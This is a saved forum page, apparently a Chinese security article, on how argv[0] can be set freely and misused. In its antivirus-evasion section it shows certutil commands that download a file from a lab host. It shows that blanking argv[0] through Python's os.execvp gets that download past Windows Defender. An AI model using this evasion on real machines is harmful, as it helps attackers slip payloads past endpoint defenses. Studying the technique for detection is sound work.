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
|
|||
|
|
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .p{color:#000000;font-weight:bold}.highlight .cp{color:#8f5902;font-style:italic}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kt{color:#204a87;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .nb{color:#204a87}.highlight .nf{color:#000000}.highlight .s2{color:#4e9a06}.highlight .s1{color:#4e9a06}</style>
|
|||
|
|
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<!--[if !IE]> -->
|
|||
|
|
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAADDUExURUxpcVVVVUNDVT5CTz1BUEBVVT1BUD1BTz5CTz5GT0BDUVVVVT5CTz5BUj1CTz5BT05OYj1CUD5GVUJCUj5CUD5BTz5BT0lJbT5CUEJCVT9DUUBHVT5CUD5CTz9CUD5BTz1BTz5CUEREUz5CUD5BUD5DTz5CUD5BT0BDUT5CTz1CUD5EUUBgYEBDUT5CUT1CTz1BUD5BUD9DUT1CT0REVT5BUENDUT1BUEBGUz1BUD9DT0FBUz1CTz5BTz1CUD1BUD1BT5JdbS4AAABAdFJOUwAJKr76DPbywR1MBuRO5fsNsyEfvdtKB4MbfiTa+FnegYwitbBXfPdYrt0pCEiL9XmsRdgeVhO8KI2KK45a2b/ePQx7AAAAwUlEQVQ4y4XTxw7CQAwE0A2E0BN67733Xv3/X4U0kYgimKxP9vgdfNhVildaBVfmpQGPaPD+7mjAW74g5q8Ewqd4QHy1T+JCm4IdsqswsEUUchhYHxCFhYENkpYw0MCFEZuCJYKuMDB1LzQZsPLehX/BCONEGCiWcWGKghKmlTAwwDA3GbByGArCQA39UBiYLfwX/gD3mdyEgSy6i8nAuIfuLAx00ByFgbaB5hT3VdUDmk8mfc0fa9Y1oKLZKyNo+QEJQV3gLnHrKwAAAABJRU5ErkJggg==" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15609?time__1311=GqjxnCTxlx0jG7DyDmhiEpKPWwlxoD"><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
|
|||
|
|
<body>
|
|||
|
|
<div class="navbar navbar-default">
|
|||
|
|
<div class=navbar-inner>
|
|||
|
|
<div class=container style=text-align:center;position:relative>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
|
|||
|
|
<![endif]-->
|
|||
|
|
<div class=brand-box>
|
|||
|
|
<a class=brand href=https://xz.aliyun.com/tab/1></a>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15609&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
|
|||
|
|
登录</a>
|
|||
|
|
|
|||
|
|
<div class="nav-collapse collapse">
|
|||
|
|
<div class="search d1 text-right">
|
|||
|
|
<form action=/search>
|
|||
|
|
<input type=text placeholder=搜索 name=keyword value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div id=Wrapper class=container>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class=row2>
|
|||
|
|
<div class=span10>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box content" width="1200px !important" style=width:1200px>
|
|||
|
|
|
|||
|
|
<div class=box-container>
|
|||
|
|
<div class=main-topic>
|
|||
|
|
<div class="clearfix user-info topic-list">
|
|||
|
|
<p><span class=content-title>探秘argv[0]:程序参数中的安全隐忧</span>
|
|||
|
|
</p>
|
|||
|
|
<div class=topic-info>
|
|||
|
|
<span class=info-left>
|
|||
|
|
<a href=https://xz.aliyun.com/u/65763>
|
|||
|
|
<span class="username cell"> 1y0ng</span></a> <span class=i-seprator> / </span>
|
|||
|
|
<span> 2024-09-13 10:52:29</span><span class=i-seprator> / </span>
|
|||
|
|
|
|||
|
|
<span>发表于北京 / </span>
|
|||
|
|
|
|||
|
|
<span>浏览数 51</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=content-node>
|
|||
|
|
|
|||
|
|
<span class="label label-default label-node-first">
|
|||
|
|
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
|
|||
|
|
<span class="label label-default">
|
|||
|
|
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
|
|||
|
|
顶(0)</a>
|
|||
|
|
<a class="vote vote-down" href=javascript:void(0)>
|
|||
|
|
踩(0)</a></span>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<hr>
|
|||
|
|
<div id=topic_content class="topic-content markdown-body">
|
|||
|
|
<h2 id=toc-0>背景</h2>
|
|||
|
|
<p>在《Why bother with argv[0]?》一文中,作者深入浅出地剖析了<code>argv[0]</code>在安全领域的潜在风险,学到了很多东西,与大家分享一下</p>
|
|||
|
|
<h2 id=toc-1>概念</h2>
|
|||
|
|
<p>程序命令行的第一个参数,通常反映程序的名称/路径,通常称为<code>argv[0]</code>,在大多数情况下可以设置为任意值而不会影响进程的流程。</p>
|
|||
|
|
<p>创建两个.c文件,分别为<code>echo_test.c</code>和<code>echo2_test.c</code></p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=cp>#include</span> <span class=cpf><unistd.h></span><span class=cp></span>
|
|||
|
|
<span class=kt>int</span> <span class=nf>main</span><span class=p>(</span><span class=kt>void</span><span class=p>){</span>
|
|||
|
|
<span class=k>return</span> <span class=n>execl</span><span class=p>(</span><span class=s>"/usr/bin/echo"</span><span class=p>,</span> <span class=s>"echo"</span><span class=p>,</span><span class=s>"hello,world!"</span><span class=p>,</span><span class=nb>NULL</span><span class=p>);</span>
|
|||
|
|
<span class=p>}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<div class=highlight><pre><span></span><span class=cp>#include</span> <span class=cpf><unistd.h></span><span class=cp></span>
|
|||
|
|
<span class=kt>int</span> <span class=nf>main</span><span class=p>(</span><span class=kt>void</span><span class=p>){</span>
|
|||
|
|
<span class=k>return</span> <span class=n>execl</span><span class=p>(</span><span class=s>"/usr/bin/echo"</span><span class=p>,</span> <span class=s>"echo22222"</span><span class=p>,</span><span class=s>"hello,world!"</span><span class=p>,</span><span class=nb>NULL</span><span class=p>);</span>
|
|||
|
|
<span class=p>}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>echo2_test.c传入的<code>argv[0]</code>为echo22222,但二者运行后都产生了相同的效果,可见一般情况下修改<code>argv[0]</code>的值不会影响到整个程序的运行。</p>
|
|||
|
|
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240913104827-a6f9618a-717a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<blockquote><p><code>execl</code> 是 Unix 和类 Unix 操作系统中用于执行新程序的函数之一,属于 <code>exec</code> 函数族。<code>execl</code> 代表 “load”(加载),它用于替换当前进程映像,执行一个新的程序。函数原型如下:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kt>int</span> <span class=nf>execl</span><span class=p>(</span><span class=k>const</span> <span class=kt>char</span> <span class=o>*</span><span class=n>path</span><span class=p>,</span> <span class=k>const</span> <span class=kt>char</span> <span class=o>*</span><span class=n>arg0</span><span class=p>,</span> <span class=p>...,</span> <span class=p>(</span><span class=kt>char</span> <span class=o>*</span><span class=p>)</span><span class=nb>NULL</span><span class=p>);</span>
|
|||
|
|
</pre></div>
|
|||
|
|
</blockquote>
|
|||
|
|
<p>同时,在其他的编程语言中同样支持用户自定义<code>argv[0]</code></p>
|
|||
|
|
<div class=highlight><pre><span></span>python3 -c <span class=s2>"import os; os.execvp('/path/to/binary', ['ARGV0', '--other', '--args', '--here'])"</span>
|
|||
|
|
perl -e <span class=s1>'exec {"/path/to/binary"} "ARGV0", "--other", "--args", "--here"'</span>
|
|||
|
|
ruby -e <span class=s2>"exec(['/path/to/binary','ARGV0'],'--other', '--args', '--here')"</span>
|
|||
|
|
bash -c <span class=s1>'exec -a "ARGV0" /path/to/binary --other --args --here'</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>但从安全的角度来讲,利用<code>argv[0]</code>可造成一定程度的安全风险。</p>
|
|||
|
|
<h2 id=toc-2>杀软对抗</h2>
|
|||
|
|
<p>以Windows Defender 为例,如果直接通过certutil -urlcache下载文件则会被阻止,但如果通过python将<code>argv[0]</code>置空,则可以成功执行。</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=c1>#下载echo1失败</span>
|
|||
|
|
certutil -f -urlcache -split http://192.168.74.135/echo_test echo1
|
|||
|
|
<span class=c1>#下载echo2失败</span>
|
|||
|
|
python -c <span class=s2>"import os; os.execvp('certutil.exe',['certutil','-f','-urlcache','-split','http://192.168.74.135/echo_test','echo2'])"</span>
|
|||
|
|
<span class=c1>#下载echo3成功</span>
|
|||
|
|
python -c <span class=s2>"import os; os.execvp('certutil.exe',[' ','-f','-urlcache','-split','http://192.168.74.135/echo_test','echo3'])"</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240913104851-b53b1798-717a-1.png title><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABr4AAAMmCAYAAACjHPFtAAEAAElEQVR4nOz9e7xmRXUnDn+r9n5Og4LSDQiKcmsBNYEohhARvCGJBGbiOKIBzIhJJCMacdBMZj4C+Qg4EzKRQUfNL+Q1QF7EC77GJCBJAC+AOA4KCoafog2Cg3LrbrzRfc6zd9X7R+1Ve+311N7P/Vy615fP4Zxn77qsWrWq9tPru9cqg7/+sQc84D3q36h/zwlmyub9nOVTCAh9Tzt/84JHEMzAdJbrvjvcvvywBoZgmHyTgsY/tP85z58x3ePzQoHDyg/WL5P1Rt0XPNc/a4PPC7XNf9dFPRxrwvp4GQDgyhK+6sV7H3+M8/AGsDBwJtRz8DOfD5KZ9BH1Qv20qHuYHLb67Yb0P2wa5HQv93Zuh9wfZkfD7XtI/RHHS+3w/pb72ZfcU4aNb8r9bVT9j60L0qdvn8NR2pz2+THpvjUyfNPCZ93+sPUzz76B4etn+HOwewSzWr+Ttj8MVlQft73lkr+t3Dj2E9ppfp7l8zIlozGmVXYPDztkBximn2mfP1PDzdb+gKbMKf017k/Q/VQ6ifutYb8MjLHw8aMFDF0zgLHVPmJgYUMpw9uo2xxXNpuowz9P8v1D6n+UtuieFdestc160l5s2v5pXp1zSTnid+kh+1ejbMt32dR4jfONugPyUfvJu2l55Bi897AJmbi81qbHFPWdZwAAV5RwzsFaiyzLkFV2URQFVar+3SFkkONi8njvY5vW2oF7pAf+3ZLKOOfiWOR9Xp/325gf19RHY8yVTTnn0LMZrLWxT9lWURRRdqrjmS6cc6225ZyDhWnUj//+StSXMqb6JFmpbGbq9suyjGPgyPM8joV/LssSmRl8AnA5aRwkJ/VFsi0s7BL75XNCn0ne1nnzGBgTL5PneaNvsknvPbIsa7RNY8+yLOp0aXERNstiXa5fIDw/yrIc0BOflyzLYl9lWcbyldBJ2yZ5uV7kWuZ2IvXP70vd8b56NmvITHLyNqge6YXrOc9t1Cfvy1qLPM+xtLSU3IPq/Tob0DvZCy/fhoF1K8abWueN3x3fH7hN8L54+6k1RZ8BNOYvJWdqjDR+aouvT9mnbdlX6Kff78e/U+skz/OGfcmfPM8b+x2Axn5H3x+5PritSz1KHfK2+dj43ibXJ9ejnH+p71122SXKQW3y9Z+yc7539vt9ZNX653NCdcqlfqv9UFv0471v7HU0p9Q+6Yz64HqUz4U2u+ef5d4pbQQAFnq9gX0/tV75GLidW2tRlmXj2cD3ENpXuF75PMp9l/Sc2v+HjTnVLv3N7bJpI83vWHK/oDbb1npubNJ+CEVRJPd2+px6BqV0zO9x+8zhSsA7RNIrDsBX3w7n9A+waZv1c5JrRhj24JGGsuoh5V2l4o/sbh3mmI/F5jTQIfYxcbPV75W2r+G9C8csxnWW05dgWWdURiH95SndkomfjTHwZvDLlxefrTXwPvwDI2zGzSXkfQl4wNGXp3CRF+gclhnmOTLCsSIEMDZPV/NUPN3+MMIrtjNiOVl+pe02YogcyyYlPfB989r8ux3GLAyTYbr9bfR9fExdsK83rZ34Ebbn4Z6z7vuiA+6ImgmmfTNjlpiHvU6r/2HUw1D7H9L8MEyrE1l90nUwMwHSmNm+Psfvn8m1Z0y7Tn3X5sHLTIF5b/FzkM+I+3LuG3oeo/uZ7YtxzzX1dzmY6rtSdd9YwNrwuylFNQCTnHrpWJhe1Nnt30Z+F0xcS8kvyY+G82HEfiXqNtIOI1YStaIlXeUB1I6Tpuyz/97Gx02QzvGBfw94N6BL6XiMjiTmbDIwDQeTFfXIkWOZ81GCO/qkU5QNqnN8kjyQ4/Cifmyn+i0dXVxPKYdZ21hSYyOnIbUlHXckf1d7w5yf/FpKPkmeSJItVV86f9vIBe5Yl45VmhMiRnhfpJuUrANruRwk9VLzndIb13mKjPDeI+/1GuPmNkg2z8cldc+dmLJvY0x4sVSMndrmDu+2fTnP8wHikJylWZZhcXExSVxE4oTpmV8nwrlNj/I6XytSz1IXjfpmcH+VOpC64fqg9cPb5DZN5IZ0Jsc+XNmYW6rPdZmaQ4K0OT4Wkk3OLx8nHx/XEZcptUfLfTq1puXfKZJd/s3HIwmWlI5TxIIcE1+bvB25/sjmOHgbtU+q3pNTOuA6ShGPfI9pkNBCPiImqB2pP/nSQddv2a60YwJfc3JNp+ahlyCu+Fqme6mXH/j11Pi5PHz/SNkN10PKbvjY5bNS6iK1hrhd8LJcJrn+5J7EdUT6ca4YGJMcv3x28f45mZaSje9lci699/HFmLbnd8r++ef8lx66BWsSQx7QK44RvsR1YtWNb36OhxXBGH7J5FSsIr/iRFjx+UsrcJR//ADhH5Z1Hbo2ff+sh+56cWOtryf/biGSKGJtQGbvkb4xDRLOpsQbh8AqJKDmhKGzP+fxj7p9+AQJszxTs8odt5OCvhhNvYHPb4Czmd/5Gs042puLpqYez4gjmNc0Tyn/wOseYzY3tfXPWP5x+5vH1y/ehengvQA/dP8Y6kAc